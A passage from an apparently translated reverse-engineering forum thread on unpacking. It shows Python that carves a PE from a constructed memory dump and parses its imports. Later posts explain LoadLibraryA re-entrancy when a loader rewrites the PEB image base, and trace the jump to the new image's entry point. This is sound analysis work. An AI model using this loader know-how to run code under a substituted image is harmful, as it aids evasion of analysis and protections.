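        off = rva_to_off(secs, u32(pe, desc) or u32(pe, desc + 0x10))
        funcs = []
        while (entry := u32(pe, off)) != 0:
            if entry & 0x80000000:                     # import by ordinal
                funcs.append(f"#{entry & 0xFFFF}")
            else:                                      # IMAGE_IMPORT_BY_NAME: skip the 2-byte hint
                funcs.append(cstr(pe, rva_to_off(secs, entry) + 2))
            off += 4
        imports[dll] = funcs
        desc += 20
    return imports

def build_sample_pe():
    """Constructed minimal PE32 (an assumption, not a real binary): one section holding an import table."""
    sec = bytearray(0x200)
    struct.pack_into("<5I", sec, 0x00, 0x1040, 0, 0, 0x1070, 0x1050)  # kernel32 descriptor
    struct.pack_into("<5I", sec, 0x14, 0, 0, 0, 0x1080, 0x1068)       # user32: OriginalFirstThunk = 0
    struct.pack_into("<3I", sec, 0x40, 0x1090, 0x80000005, 0)         # kernel32 ILT
    struct.pack_into("<3I", sec, 0x50, 0x1090, 0x80000005, 0)         # kernel32 IAT (on-disk copy)
    struct.pack_into("<2I", sec, 0x68, 0x10A0, 0)                     # user32 IAT
    sec[0x70:0x7D] = b"kernel32.dll\0"
    sec[0x80:0x8B] = b"user32.dll\0"
    sec[0x90:0x9E] = b"\0\0CreateFileA\0"                             # hint, then name
    sec[0xA0:0xB2] = b"\0\0LoadRemoteFonts\0"
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                           # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # FILE_HEADER
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                           # PE32 magic
    struct.pack_into("<II", hdr, opt + 32, 0x1000, 0x200)             # SectionAlignment, FileAlignment
    struct.pack_into("<II", hdr, opt + 56, 0x2000, 0x200)             # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", hdr, opt + 92, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", hdr, opt + 0x68, 0x1000, 0x3C)            # import directory RVA, size
    sh = opt + 0xE0                                                   # first IMAGE_SECTION_HEADER
    hdr[sh:sh + 8] = b".idata\0\0"
    struct.pack_into("<IIII", hdr, sh + 8, 0xB2, 0x1000, 0x200, 0x200)  # VirtualSize, VA, raw size, raw ptr
    struct.pack_into("<I", hdr, sh + 36, 0xC0000040)                  # initialized data, read/write
    return bytes(hdr + sec)

SAMPLE_DUMP = b"\x90" * 0x100 + build_sample_pe() + b"\xCC" * 0x80    # constructed "memory dump"

if __name__ == "__main__":
    off, pe = carve_pe(SAMPLE_DUMP)
    print(f"PE at {off:#x}, {len(pe):#x} bytes on disk:", parse_imports(pe))
```

The carved length is max(PointerToRawData + SizeOfRawData) over the section table, the same file-size figure #8 obtained from LordPE; a memory dump normally carries unrelated bytes past that point, so trimming by the section table rather than by the dump length is the habit to keep. The user32 descriptor deliberately has OriginalFirstThunk = 0 so the FirstThunk fallback from the listing above is exercised.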
Post #14
After reading the question above I tried it; the direct cause is re-entrancy of LoadLibraryA.
Earlier the loader changed ImageBaseAddress in the PEB and the contents of the corresponding LDR_ENTRY; later, when LoadLibraryA loads USER32.DLL, a prompt appears saying "du.exe is not a valid Win32 application".
Then, while the system is loading USER32.DLL, LoadLibraryA gets re-entered, i.e. in the middle of LoadLibraryA loading USER32.DLL, LoadLibraryA is called again to load other DLLs.
That's why single-stepping at the place where LoadLibraryA calls LoadLibraryExA, as in the post above, produces this problem.
Specifically:
At this line in LoadLibraryA:
7C801D9F E8 ABFFFFFF CALL kernel32.LoadLibraryExA
When you press F8 here, OD sets a one-shot hardware execution breakpoint on the next line and resumes execution.
But this LoadLibraryExA call re-enters: while loading user32.dll it loads some other DLLs, and during that USP10.dll's DllMain calls LoadLibraryA again to load gdi32.dll, so execution stops at the hardware execution breakpoint set earlier; the place where it stops is therefore not the call frame of the earlier User32.dll load.
The flow is:
LoadLibraryA("USER32.DLL") -> press F8 at the call to LoadLibraryExA -> LoadLibraryExA("USER32.DLL") -> ... USP10!DllMain -> LoadLibraryA("gdi32.dll") -> LoadLibraryExA("gdi32.dll") -> breaks
Post #15
Actually, at this line:
00511500 . FF10 CALL DWORD PTR DS:[EAX]
when it loads USER32.DLL, if you just press F8 (F7 stepping into LoadLibraryA runs into the re-entrancy problem I described above), the error prompt still pops up, but it breaks normally.
Finally it returns at the following place:
00511636 5E pop esi
00511637 5F pop edi
00511638 5B pop ebx
00511639 C9 leave
0051163A C2 0C00 retn 0C
After returning it reaches the following place:
00511115 5F pop edi
00511116 5E pop esi
00511117 5D pop ebp
00511118 83C4 04 add esp, 4
0051111B 5B pop ebx
0051111C 5A pop edx
0051111D 83C4 08 add esp, 8
00511120 894C24 04 mov dword ptr [esp+4], ecx
00511124 FFE0 jmp eax ; 004040FF
and enters the new image's entry point.